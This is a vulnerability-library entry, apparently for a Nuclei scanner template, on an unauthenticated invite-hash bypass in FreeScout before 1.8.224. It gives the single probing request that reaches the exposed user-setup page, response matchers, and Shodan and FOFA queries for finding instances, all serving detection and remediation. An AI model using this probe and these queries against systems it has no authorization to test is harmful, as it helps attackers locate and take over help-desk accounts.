/Vulnerability Library

FreeScout < 1.8.224 - Invite Hash Authorization Bypass

CVE-2026-53595
Early Release

Description

FreeScout prior to 1.8.224 contains an authentication bypass caused by improper invite_hash handling and decryption failure in user setup endpoint, letting anonymous attackers reset credentials and log in as the lowest-id activated user, exploit requires no authentication.

Severity

Critical

CVSS Score

9.4

Exploit Probability

1%

Affected Product

freescout

Published Date

September 2, 2026

Template Author

str4k3r

CVE-2026-53595.yaml
id: CVE-2026-53595

info:
  name: FreeScout < 1.8.224 - Invite Hash Authorization Bypass
  author: str4k3r
  severity: critical
  description: |
    FreeScout prior to 1.8.224 contains an authentication bypass caused by improper invite_hash handling and decryption failure in user setup endpoint, letting anonymous attackers reset credentials and log in as the lowest-id activated user, exploit requires no authentication.
  impact: |
    Anonymous attackers can reset email and password of the lowest-id activated user, gaining full access including administrator privileges.
  remediation: |
    Upgrade to version 1.8.224 or later.
  reference:
    - https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-jqj5-r72v-v29g
    - https://github.com/freescout-help-desk/freescout/commit/c4688c31
    - https://nvd.nist.gov/vuln/detail/CVE-2026-53595
  classification:
    cve-id: CVE-2026-53595
    epss-score: 0.00616
    epss-percentile: 0.47515
    cwe-id: CWE-289
    cvss-score: 9.4
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
  metadata:
    verified: true
    max-request: 1
    vendor: freescout-help-desk
    product: freescout
    shodan-query: http.title:"FreeScout"
    fofa-query: title="FreeScout" || body="freescout"
  tags: cve,cve2026,freescout,helpdesk,laravel,authbypass,unauth

http:
  - raw:
      - |
        GET /user-setup/%20/9999999999 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "name=\"password_confirmation\"", "User Setup Wizard")'
          - '!contains(body, "No invite was found")'
        condition: and
# digest: 4b0a00483046022100d5f88321a2ca5080b94e502bdd32a6c725f768a7115837cdcd0d9c333da7b94002210097d6c51055b3f6910b3f73c75b0dedf988e79076b5c6307987ba28e939f6a5b9:922c64590222798bb761d5b6d8e72950
9.4Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
CVE ID:
cve-2026-53595
CWE ID:
cwe-289

References

https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-jqj5-r72v-v29ghttps://github.com/freescout-help-desk/freescout/commit/c4688c31https://nvd.nist.gov/vuln/detail/CVE-2026-53595

Remediation Steps

Upgrade to version 1.8.224 or later.